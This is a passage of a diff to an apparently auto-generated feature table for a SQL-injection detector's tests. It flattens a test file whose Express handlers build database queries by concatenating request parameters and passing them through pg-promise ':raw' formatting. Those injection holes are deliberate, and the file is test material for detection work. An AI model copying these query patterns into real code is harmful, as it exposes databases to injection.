object of anonymous function | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | exceptional return of anonymous function | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | exceptional return of anonymous function | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | exceptional return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | exceptional return of anonymous function | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | return of anonymous function | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | return of anonymous function | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | return of anonymous function | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | t => {\\n ... OK\\n } | CalleeFlexibleAccessPath | db.task | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | t => {\\n ... OK\\n } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | t => {\\n ... OK\\n } | calleeImports | pg-promise | @@ -3867,6 +18826,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | t => {\\n ... OK\\n } | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | t => {\\n ... OK\\n } | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:59:11:61:3 | t => {\\n ... OK\\n } | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:14 | t | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:14 | t | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:14 | t | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:14 | t | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:14 | t | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:18 | t.one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:18 | t.one | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:18 | t.one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:18 | t.one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:18 | t.one | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:25 | exceptional return of t.one(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:25 | exceptional return of t.one(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:25 | exceptional return of t.one(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:25 | exceptional return of t.one(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:25 | exceptional return of t.one(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:25 | t.one(query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:25 | t.one(query) | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:25 | t.one(query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:25 | t.one(query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:14:60:25 | t.one(query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:16:60:18 | one | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:16:60:18 | one | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:16:60:18 | one | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:16:60:18 | one | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:16:60:18 | one | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:20:60:24 | query | CalleeFlexibleAccessPath | t.one | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:20:60:24 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:20:60:24 | query | contextFunctionInterfaces | cnd(t) | @@ -3875,6 +18859,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:20:60:24 | query | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:20:60:24 | query | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:60:20:60:24 | query | receiverName | t | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:62:4 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:62:4 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:62:4 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:62:4 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:62:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:62:11 | db.taskIf | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:62:11 | db.taskIf | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:62:11 | db.taskIf | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:62:11 | db.taskIf | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:62:11 | db.taskIf | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:65:3 | db.task ... OK\\n ) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:65:3 | db.task ... OK\\n ) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:65:3 | db.task ... OK\\n ) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:65:3 | db.task ... OK\\n ) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:65:3 | db.task ... OK\\n ) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:65:3 | exceptional return of db.task ... OK\\n ) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:65:3 | exceptional return of db.task ... OK\\n ) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:65:3 | exceptional return of db.task ... OK\\n ) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:65:3 | exceptional return of db.task ... OK\\n ) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:3:65:3 | exceptional return of db.task ... OK\\n ) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:6:62:11 | taskIf | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:6:62:11 | taskIf | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:6:62:11 | taskIf | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:6:62:11 | taskIf | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:62:6:62:11 | taskIf | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:5:63:30 | { cnd: ... uery) } | CalleeFlexibleAccessPath | db.taskIf | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:5:63:30 | { cnd: ... uery) } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:5:63:30 | { cnd: ... uery) } | calleeImports | pg-promise | @@ -3884,6 +18893,51 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:5:63:30 | { cnd: ... uery) } | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:5:63:30 | { cnd: ... uery) } | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:5:63:30 | { cnd: ... uery) } | receiverName | db | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:9 | cnd | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:9 | cnd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:9 | cnd | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:9 | cnd | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:9 | cnd | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:28 | cnd: t ... (query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:28 | cnd: t ... (query) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:28 | cnd: t ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:28 | cnd: t ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:28 | cnd: t ... (query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:28 | cnd: t ... (query) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:28 | cnd: t ... (query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:28 | cnd: t ... (query) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:28 | cnd: t ... (query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:7:63:28 | cnd: t ... (query) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:11 | query | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:11 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:11 | query | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:11 | query | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:11 | query | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:12 | t | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:12 | t | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:12 | t | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:12 | t | contextSurroundingFunctionParameters | (req, res)\n(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:12 | t | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:12 | t | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:12 | t | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:12 | t | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:12 | t | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:12 | t | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | 'arguments' object of method cnd | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | 'arguments' object of method cnd | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | 'arguments' object of method cnd | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | 'arguments' object of method cnd | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | 'arguments' object of method cnd | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | exceptional return of method cnd | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | exceptional return of method cnd | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:63:12:63:28 | exceptional return of method cnd | enclosingFunctionBody | req res db pgp process 